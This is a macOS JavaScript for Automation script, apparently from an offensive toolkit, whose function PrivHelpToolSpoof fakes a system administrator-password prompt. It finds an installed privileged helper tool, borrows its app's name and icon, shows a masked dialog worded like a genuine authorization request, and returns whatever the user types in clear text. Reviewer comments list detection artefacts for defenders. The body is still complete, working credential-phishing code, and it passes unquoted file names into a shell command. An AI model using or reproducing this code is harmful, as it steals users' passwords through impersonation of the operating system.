ObjC.import('Foundation')
ObjC.import('AppKit')
// Script-wide handles used by PrivHelpToolSpoof() below.
// currentApp is the process hosting this JXA script; Standard Additions are
// enabled on it because the function calls doShellScript and systemInfo on it.
var currentApp = Application.currentApplication();
currentApp.includeStandardAdditions = true;
// Read the __CFBundleIdentifier attribute of the hosting process and coerce it
// to a plain string.
// NOTE(review): presumably this is the bundle identifier of the application the
// script is running inside - confirm on the host being analysed.
var contextApp = currentApp.systemAttribute('__CFBundleIdentifier')
var contextString = contextApp.toString()
// newApp addresses the application with that identifier. Every displayDialog
// call in PrivHelpToolSpoof() goes through newApp rather than currentApp, so
// the dialogs are requested from that application.
var newApp = Application(contextString)
newApp.includeStandardAdditions = true;
/**
 * Shows a hidden-answer password dialog worded like a macOS "wants to make
 * changes" authorization prompt and returns whatever text was typed into it.
 *
 * Flow, as written:
 *  1. If /Library/PrivilegedHelperTools exists, every entry in it is passed to
 *     `launchctl plist __TEXT,__info_plist <path> | grep -A1 AuthorizedClients`
 *     and the text between "identifier" and "and" in the output is kept.
 *  2. The first value kept is looked up through NSWorkspace; when an
 *     application is found, its name becomes the dialog title and the first
 *     .icns file in its Contents/Resources becomes the dialog icon.
 *  3. A dialog with hiddenAnswer is shown through newApp. An empty answer
 *     triggers one more dialog.
 *  4. If the directory does not exist, a generic "needs an update" dialog is
 *     shown instead.
 *
 * Observable artefacts for detection, all taken from the code below:
 *  - a shell child of the script host running `launchctl plist
 *    __TEXT,__info_plist` against files under /Library/PrivilegedHelperTools,
 *    piped to `grep -A1 AuthorizedClients`;
 *  - a scripting-additions dialog with a hidden text field whose body reads
 *    "<identifier> wants to make changes." followed by "Enter the
 *    Administrator password for <short user name> to allow this.";
 *  - the fixed icon path under PreferencePanesSupport.framework used as the
 *    fallback icon.
 * NOTE(review): genuine authorization prompts are drawn by the system rather
 * than by an application's display-dialog call - confirm against the macOS
 * version in scope before relying on this as a discriminator.
 *
 * @returns {string} A three-line asterisk banner followed by the text entered
 *   in the dialog, in clear text, and a trailing newline.
 */
function PrivHelpToolSpoof(){
// Returns the entry names of strPath (tilde expanded) as a JS array. The error
// out-parameter is null, so a failed listing is not reported by this helper.
function listDirectory(strPath) {
var fm = $.NSFileManager.defaultManager;
return ObjC.unwrap(
fm.contentsOfDirectoryAtPathError($(strPath)
.stringByExpandingTildeInPath, null))
.map(ObjC.unwrap);
}
var output = "";
// Branch on whether the privileged helper directory is present on this host.
var PrivilegedHelperExistsCheck = $.NSFileManager.alloc.init.fileExistsAtPath('/Library/PrivilegedHelperTools')
if (PrivilegedHelperExistsCheck == true) {
var enumerateFolderContents = listDirectory('/Library/PrivilegedHelperTools')
// No-op error handler: failures inside the loop below are discarded.
function stoperror() {
return true;
}
var fullPaths = []
// for...in over an array yields its indices; each entry name is concatenated,
// unquoted, into a shell command line run through doShellScript.
for (var key in enumerateFolderContents) {
try{
var parentHelper = currentApp.doShellScript("launchctl plist __TEXT,__info_plist " + " " + '/Library/PrivilegedHelperTools/' + enumerateFolderContents[key] + " " + "| grep -A1 AuthorizedClients")
// Keep the text that follows the first "identifier" up to the next "and".
var formatPaths = parentHelper.split('identifier')[1].split('and')[0]
}catch(e){stoperror(e)}
// `+=` with a string operand turns fullPaths from an array into a string.
// formatPaths is function-scoped, so when the try block throws, the value
// left from an earlier iteration (or undefined) is what gets appended here;
// an appended undefined becomes the text "undefined", filtered out below.
fullPaths += formatPaths + "\n";
}
// Put every comma-separated value on its own line, then drop the lines that
// are exactly the text "undefined".
var fixedFileOutput = fullPaths.replace(/,/gi, "\n");
var splitFileOutput = fixedFileOutput.split("\n")
var cleanFullPaths = [];
for (var i = 0; i < splitFileOutput.length; i++) {
if (splitFileOutput[i] != "undefined") {
cleanFullPaths.push(splitFileOutput[i]);
}
}
// Pieces of the dialog text. defaultIconName, defaultIconStr and
// resourcesFolder are assigned here but not read anywhere in this function.
var defaultIconName = "AppIcon"
var defaultIconStr = "/System/Library/PrivateFrameworks/PreferencePanesSupport.framework/PlugIns/AdvertisingExtension.appex/Contents/Resources/icon.icns"
var resourcesFolder = "/Contents/Resources"
var iconExt = ".icns"
var makeChanges = " wants to make changes."
var privString = "Enter the Administrator password for "
var allowThis = " to allow this."
var userName = currentApp.systemInfo().shortUserName;
// First extracted value with quote characters removed and whitespace trimmed.
// This same string is used both as the subject of the dialog text and as the
// bundle identifier for the NSWorkspace lookup.
var hlprName = cleanFullPaths[0].replace(/['"]+/g, '').trim()
var text = hlprName + makeChanges + "\n" + privString + userName + allowThis
// File-system path of the application registered for hlprName, coerced to a
// string. The code below treats the text "undefined" as "no application found".
var title = $.NSWorkspace.sharedWorkspace.URLForApplicationWithBundleIdentifier(hlprName).fileSystemRepresentation + '';
var wonkyApp = title.toString()
if (wonkyApp == "undefined" ){
// No application found: generic title, and iconFolder / iconName stay unset.
var iconNameString = "noicon"
var appName = "Application is Unable to Continue" + "\n" + "Please Close the Application"
}else {
// appName is the last path component (a one-element array from slice); the
// icon candidates are the names in Contents/Resources that contain ".icns".
var appName = title.split('/').slice(-1)
var iconFolder = title + "/Contents/Resources/"
var enumerateIconfolder = listDirectory(iconFolder)
var iconName =
enumerateIconfolder.filter(function(file){
return file.indexOf(iconExt) !== -1;
});
var iconNameString = iconName.toString()
}
// Use the application's first .icns file when one was found, otherwise the
// fixed system icon path.
if (iconNameString.includes('icns') == true ){
var icon = iconFolder + iconName[0]
} else {var icon = "/System/Library/PrivateFrameworks/PreferencePanesSupport.framework/PlugIns/AdvertisingExtension.appex/Contents/Resources/icon.icns"
}
// First dialog, requested from newApp, with the typed text masked.
// NOTE(review): in JXA the Cancel button normally raises a user-cancelled
// error; nothing here catches it, so it would propagate to the caller - confirm.
var prompt = newApp.displayDialog(text, {
defaultAnswer: "",
buttons: ['OK', 'Cancel'],
defaultButton: 'OK',
cancelButton: 'Cancel',
withTitle: appName,
withIcon: Path(icon),
hiddenAnswer: true
});
var promptResults = prompt.textReturned
if (promptResults == ""){
// Empty answer: show one more dialog with "Unable to Continue" wording and
// record its answer, whether or not it is empty.
var textagain = appName + " is Unable to Continue" + "\n" + "Please Close the Application or " + privString + userName
var promptagain = newApp.displayDialog(textagain, {
defaultAnswer: "",
buttons: ['OK', 'Cancel'],
defaultButton: 'OK',
cancelButton: 'Cancel',
withTitle: appName,
withIcon: Path(icon),
hiddenAnswer: true
});
var promptResultsRound2 = promptagain.textReturned
output += "**************************************\n" + "**** Contents of the Prompt Entry ****\n" + "**************************************\n" + promptResultsRound2 + "\n"
} else {
output += "**************************************\n" + "**** Contents of the Prompt Entry ****\n" + "**************************************\n" + promptResults + "\n"
}
} else {
// /Library/PrivilegedHelperTools is absent: show a single generic dialog with
// the fixed system icon. config is assigned but never read.
var config = [];
var icon = "/System/Library/PrivateFrameworks/PreferencePanesSupport.framework/PlugIns/AdvertisingExtension.appex/Contents/Resources/icon.icns";
var title = "An Application Needs an Update to Continue";
var text = "An Application Needs an Update to Continue";
var promptClassic = newApp.displayDialog(text, {
defaultAnswer: "",
buttons: ['OK', 'Cancel'],
defaultButton: 'OK',
cancelButton: 'Cancel',
withTitle: title,
withIcon: Path(icon),
hiddenAnswer: true
});
var promptResultsclassic = promptClassic.textReturned
output += "**************************************\n" + "**** Contents of the Prompt Entry ****\n" + "**************************************\n" + promptResultsclassic + "\n"
}
// The entered text is handed back to the caller in clear text inside output.
return output
}